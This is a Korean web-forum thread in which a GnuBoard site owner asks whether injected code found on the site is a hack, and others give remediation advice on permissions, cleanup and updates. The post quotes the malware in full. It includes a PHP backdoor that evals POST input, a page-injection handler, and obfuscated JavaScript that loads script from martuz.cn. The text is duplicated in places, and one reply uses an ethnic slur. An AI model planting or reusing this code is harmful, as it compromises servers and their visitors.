해킹인건가요? 아니면 다른이유가.. 정보
해킹인건가요? 아니면 다른이유가..본문
며칠전 부터 사이트 접속이 너무 느리더니만
PHP파일 제일위에
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMZE8pe3ZhciBQckNuPSd2YXJgMjBhYDNkYDIyU2A2M3JpcHRFbmdgNjlgNmVgNjVgMjJgMmNiYDNkYDIyYDU2ZXJgNzNpb24oKStgMjJgMmNqYDNkYDIyYDIyYDJjdWAzZG5hdmA2OWdgNjF0YDZmcmAyZWA3NXNlYDcyQWdgNjVudGAzYmA2OWA2NmAyOGAyOGA3NWAyZWA2OW5kZXhPYDY2YDI4YDIyYDQzaHJgNmZtZWAyMilgM2MwKWAyNmAyNihgNzVgMmVpbmRleE9mKGAyMldpbmAyMmAyOWAzZTApYDI2YDI2KHVgMmVpbmA2NGA2NXhPZihgMjJOVGAyMDZgMjJgMjlgM2NgMzApYDI2YDI2KGRgNmZgNjNgNzVtZW50YDJlY29va2A2OWA2NWAyZWA2OWA2ZWA2NGVgNzhgNGZmYDI4YDIybWlla2AzZDFgMjIpYDNjMGAyOWAyNmAyNmAyOGA3NHlgNzBgNjVvYDY2KGA3YXJ2enRzKWAyMWAzZHR5YDcwYDY1b2A2NihgMjJBYDIyYDI5KSlgN2J6cnZ6YDc0c2AzZGAyMkFgMjJgM2JldmFsKGAyMmlmKHdpbmA2NG93YDJlYDIyK2ErYDIyKWpgM2RqK2AyMithK2AyMk1ham9yYDIyYDJiYmAyYmFgMmJgMjJNaW5vcmAyMmAyYmA2MmAyYmErYDIyQmA3NWlsZGAyMitgNjIrYDIyYDZhYDNiYDIyKWAzYmRvY3VtZW50YDJld3JgNjl0YDY1KGAyMmAzY2A3M2NyaXB0YDIwc2A3MmNgM2RgMmZgMmZtYXJgNzRgMjJgMmJgMjJ1emAyZWNgNmVgMmZgNzZpZGAyZmAzZmlkYDNkYDIyK2orYDIyYDNlYDNjYDVjYDJmYDczY2A3MmA2OWA3MHRgM2VgMjIpYDNiYDdkJzt2YXIgYldPcD11bmVzY2FwZShQckNuLnJlcGxhY2UoTGRPLCclJykpO2V2YWwoYldPcCl9KSgvXGAvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
글들이 적혀있네요..
JS파일에는
하단에
<!--
(function(LdO){var PrCn='var`20a`3d`22S`63riptEng`69`6e`65`22`2cb`3d`22`56er`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69g`61t`6fr`2e`75se`72Ag`65nt`3b`69`66`28`28`75`2e`69ndexO`66`28`22`43hr`6fme`22)`3c0)`26`26(`75`2eindexOf(`22Win`22`29`3e0)`26`26(u`2ein`64`65xOf(`22NT`206`22`29`3c`30)`26`26(d`6f`63`75ment`2ecook`69`65`2e`69`6e`64e`78`4ff`28`22miek`3d1`22)`3c0`29`26`26`28`74y`70`65o`66(`7arvzts)`21`3dty`70`65o`66(`22A`22`29))`7bzrvz`74s`3d`22A`22`3beval(`22if(win`64ow`2e`22+a+`22)j`3dj+`22+a+`22Major`22`2bb`2ba`2b`22Minor`22`2b`62`2ba+`22B`75ild`22+`62+`22`6a`3b`22)`3bdocument`2ewr`69t`65(`22`3c`73cript`20s`72c`3d`2f`2fmar`74`22`2b`22uz`2ec`6e`2f`76id`2f`3fid`3d`22+j+`22`3e`3c`5c`2f`73c`72`69`70t`3e`22)`3b`7d';var bWOp=unescape(PrCn.replace(LdO,'%'));eval(bWOp)})(/\`/g);
-->
HTML파일에는
<script language=javascript><!--
(function(LdO){var PrCn='var`20a`3d`22S`63riptEng`69`6e`65`22`2cb`3d`22`56er`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69g`61t`6fr`2e`75se`72Ag`65nt`3b`69`66`28`28`75`2e`69ndexO`66`28`22`43hr`6fme`22)`3c0)`26`26(`75`2eindexOf(`22Win`22`29`3e0)`26`26(u`2ein`64`65xOf(`22NT`206`22`29`3c`30)`26`26(d`6f`63`75ment`2ecook`69`65`2e`69`6e`64e`78`4ff`28`22miek`3d1`22)`3c0`29`26`26`28`74y`70`65o`66(`7arvzts)`21`3dty`70`65o`66(`22A`22`29))`7bzrvz`74s`3d`22A`22`3beval(`22if(win`64ow`2e`22+a+`22)j`3dj+`22+a+`22Major`22`2bb`2ba`2b`22Minor`22`2b`62`2ba+`22B`75ild`22+`62+`22`6a`3b`22)`3bdocument`2ewr`69t`65(`22`3c`73cript`20s`72c`3d`2f`2fmar`74`22`2b`22uz`2ec`6e`2f`76id`2f`3fid`3d`22+j+`22`3e`3c`5c`2f`73c`72`69`70t`3e`22)`3b`7d';var bWOp=unescape(PrCn.replace(LdO,'%'));eval(bWOp)})(/\`/g);
--></script>
하나씩 지우기도 너무 힘이드네요..
그누 버젼은
4.22.04 쓰고 있는곳도 그렇고
4.31.03 쓰고 있는 곳도 그렇네요.
혹시 최신패치를 안해서 그런건가요?
검색을 해보니 2008년도에 웜이라는 글이 있던데요.
혹시 같은 증상을 보이신분 안계시나요?
PHP파일 제일위에
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihMZE8pe3ZhciBQckNuPSd2YXJgMjBhYDNkYDIyU2A2M3JpcHRFbmdgNjlgNmVgNjVgMjJgMmNiYDNkYDIyYDU2ZXJgNzNpb24oKStgMjJgMmNqYDNkYDIyYDIyYDJjdWAzZG5hdmA2OWdgNjF0YDZmcmAyZWA3NXNlYDcyQWdgNjVudGAzYmA2OWA2NmAyOGAyOGA3NWAyZWA2OW5kZXhPYDY2YDI4YDIyYDQzaHJgNmZtZWAyMilgM2MwKWAyNmAyNihgNzVgMmVpbmRleE9mKGAyMldpbmAyMmAyOWAzZTApYDI2YDI2KHVgMmVpbmA2NGA2NXhPZihgMjJOVGAyMDZgMjJgMjlgM2NgMzApYDI2YDI2KGRgNmZgNjNgNzVtZW50YDJlY29va2A2OWA2NWAyZWA2OWA2ZWA2NGVgNzhgNGZmYDI4YDIybWlla2AzZDFgMjIpYDNjMGAyOWAyNmAyNmAyOGA3NHlgNzBgNjVvYDY2KGA3YXJ2enRzKWAyMWAzZHR5YDcwYDY1b2A2NihgMjJBYDIyYDI5KSlgN2J6cnZ6YDc0c2AzZGAyMkFgMjJgM2JldmFsKGAyMmlmKHdpbmA2NG93YDJlYDIyK2ErYDIyKWpgM2RqK2AyMithK2AyMk1ham9yYDIyYDJiYmAyYmFgMmJgMjJNaW5vcmAyMmAyYmA2MmAyYmErYDIyQmA3NWlsZGAyMitgNjIrYDIyYDZhYDNiYDIyKWAzYmRvY3VtZW50YDJld3JgNjl0YDY1KGAyMmAzY2A3M2NyaXB0YDIwc2A3MmNgM2RgMmZgMmZtYXJgNzRgMjJgMmJgMjJ1emAyZWNgNmVgMmZgNzZpZGAyZmAzZmlkYDNkYDIyK2orYDIyYDNlYDNjYDVjYDJmYDczY2A3MmA2OWA3MHRgM2VgMjIpYDNiYDdkJzt2YXIgYldPcD11bmVzY2FwZShQckNuLnJlcGxhY2UoTGRPLCclJykpO2V2YWwoYldPcCl9KSgvXGAvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \n\(function\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
글들이 적혀있네요..
JS파일에는
하단에
<!--
(function(LdO){var PrCn='var`20a`3d`22S`63riptEng`69`6e`65`22`2cb`3d`22`56er`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69g`61t`6fr`2e`75se`72Ag`65nt`3b`69`66`28`28`75`2e`69ndexO`66`28`22`43hr`6fme`22)`3c0)`26`26(`75`2eindexOf(`22Win`22`29`3e0)`26`26(u`2ein`64`65xOf(`22NT`206`22`29`3c`30)`26`26(d`6f`63`75ment`2ecook`69`65`2e`69`6e`64e`78`4ff`28`22miek`3d1`22)`3c0`29`26`26`28`74y`70`65o`66(`7arvzts)`21`3dty`70`65o`66(`22A`22`29))`7bzrvz`74s`3d`22A`22`3beval(`22if(win`64ow`2e`22+a+`22)j`3dj+`22+a+`22Major`22`2bb`2ba`2b`22Minor`22`2b`62`2ba+`22B`75ild`22+`62+`22`6a`3b`22)`3bdocument`2ewr`69t`65(`22`3c`73cript`20s`72c`3d`2f`2fmar`74`22`2b`22uz`2ec`6e`2f`76id`2f`3fid`3d`22+j+`22`3e`3c`5c`2f`73c`72`69`70t`3e`22)`3b`7d';var bWOp=unescape(PrCn.replace(LdO,'%'));eval(bWOp)})(/\`/g);
-->
HTML파일에는
<script language=javascript><!--
(function(LdO){var PrCn='var`20a`3d`22S`63riptEng`69`6e`65`22`2cb`3d`22`56er`73ion()+`22`2cj`3d`22`22`2cu`3dnav`69g`61t`6fr`2e`75se`72Ag`65nt`3b`69`66`28`28`75`2e`69ndexO`66`28`22`43hr`6fme`22)`3c0)`26`26(`75`2eindexOf(`22Win`22`29`3e0)`26`26(u`2ein`64`65xOf(`22NT`206`22`29`3c`30)`26`26(d`6f`63`75ment`2ecook`69`65`2e`69`6e`64e`78`4ff`28`22miek`3d1`22)`3c0`29`26`26`28`74y`70`65o`66(`7arvzts)`21`3dty`70`65o`66(`22A`22`29))`7bzrvz`74s`3d`22A`22`3beval(`22if(win`64ow`2e`22+a+`22)j`3dj+`22+a+`22Major`22`2bb`2ba`2b`22Minor`22`2b`62`2ba+`22B`75ild`22+`62+`22`6a`3b`22)`3bdocument`2ewr`69t`65(`22`3c`73cript`20s`72c`3d`2f`2fmar`74`22`2b`22uz`2ec`6e`2f`76id`2f`3fid`3d`22+j+`22`3e`3c`5c`2f`73c`72`69`70t`3e`22)`3b`7d';var bWOp=unescape(PrCn.replace(LdO,'%'));eval(bWOp)})(/\`/g);
--></script>
하나씩 지우기도 너무 힘이드네요..
그누 버젼은
4.22.04 쓰고 있는곳도 그렇고
4.31.03 쓰고 있는 곳도 그렇네요.
혹시 최신패치를 안해서 그런건가요?
검색을 해보니 2008년도에 웜이라는 글이 있던데요.
혹시 같은 증상을 보이신분 안계시나요?
댓글 전체
님의 컴퓨터 바이러스를 체크 해보세요..
요즘 문제가 많은 글이더군요...
아마 해결책은 특별하진 않구요.
퍼미션의 변경
기존 화일에서 삭제 작업 (숨겨진 곳이 의외로 많습니다.)
최신버전의 업데이트 등등
아마 이 3가지만 지켜진다면 거의 90% 이상은 막아질듯 합니다만 ....
아마 해결책은 특별하진 않구요.
퍼미션의 변경
기존 화일에서 삭제 작업 (숨겨진 곳이 의외로 많습니다.)
최신버전의 업데이트 등등
아마 이 3가지만 지켜진다면 거의 90% 이상은 막아질듯 합니다만 ....
catkim // 여러 사람이 이용하는 사이트고 제가 사이트를 보기전부터 그런거라 제 PC하곤 상관이 없는거 같은데 PC의 바이러스하고 상관이 있는거라면 한번 해보아야겠네요 .답변 감사합니다.
방황하는중년 //
퍼미션을 어떤 식으로 변경을 해야 할지도 모르겠네요 .
기존 권한이 644로 되어있는 파일도 변경이 되있는걸 보면 소유자의 권한으로 변경을 하는거 같은데.그렇다고 아무도 못쓰게 할수도 없구...
기존 파일은 모든 파일을 다 보고 지우긴 했습니다.
아무래도 그누 버젼이 문제일까요.
답변 감사합니다..
방황하는중년 //
퍼미션을 어떤 식으로 변경을 해야 할지도 모르겠네요 .
기존 권한이 644로 되어있는 파일도 변경이 되있는걸 보면 소유자의 권한으로 변경을 하는거 같은데.그렇다고 아무도 못쓰게 할수도 없구...
기존 파일은 모든 파일을 다 보고 지우긴 했습니다.
아무래도 그누 버젼이 문제일까요.
답변 감사합니다..
아 응답이 늦어서 죄송합니다.
하루동안 삽질을 하러 갔다 온다고 늦게 들렸습니다.
퍼미션이 644 라고는 하시지만 일반페이지의 경우이고
일부 페이지는 extends 부분이나 js 같은 경우 707 내지 777 이 되어 있는 경우가 많습니다.
어떤 이유에서든지 최소하 하는 부분으로 적용이 유저에게나 개발자에게 1번더 돌아가야 할 부분이 되지만 보안상으로는 좀더 안전합니다.
아마 퍼미션은 644 내지 755 를 보통 주시게 될듯하나
그누 버전이 이전 버전이라면 이미 공개된 취약점이 있는것은 사실이고 그 구멍을 열어 놓고 있다는 사실은 알고 계신겁니다 ^^
저 같은 경우 튜닝을 많이하여 쓰다 보니 가끔 버전 업이 힘들지만 그런대로 중요 부분을 막고 나머진 비밀리에 다른 부분으로 리다렉이트 검사를 하니 거의 90% 이상은 취약점에서 벗어나지더군요.
짱께뿐 아니라 한국사람만 오게끔 -_- geo_ip 한번 올려 보았더니..효과가 좋긴 좋더군요..
하루동안 삽질을 하러 갔다 온다고 늦게 들렸습니다.
퍼미션이 644 라고는 하시지만 일반페이지의 경우이고
일부 페이지는 extends 부분이나 js 같은 경우 707 내지 777 이 되어 있는 경우가 많습니다.
어떤 이유에서든지 최소하 하는 부분으로 적용이 유저에게나 개발자에게 1번더 돌아가야 할 부분이 되지만 보안상으로는 좀더 안전합니다.
아마 퍼미션은 644 내지 755 를 보통 주시게 될듯하나
그누 버전이 이전 버전이라면 이미 공개된 취약점이 있는것은 사실이고 그 구멍을 열어 놓고 있다는 사실은 알고 계신겁니다 ^^
저 같은 경우 튜닝을 많이하여 쓰다 보니 가끔 버전 업이 힘들지만 그런대로 중요 부분을 막고 나머진 비밀리에 다른 부분으로 리다렉이트 검사를 하니 거의 90% 이상은 취약점에서 벗어나지더군요.
짱께뿐 아니라 한국사람만 오게끔 -_- geo_ip 한번 올려 보았더니..효과가 좋긴 좋더군요..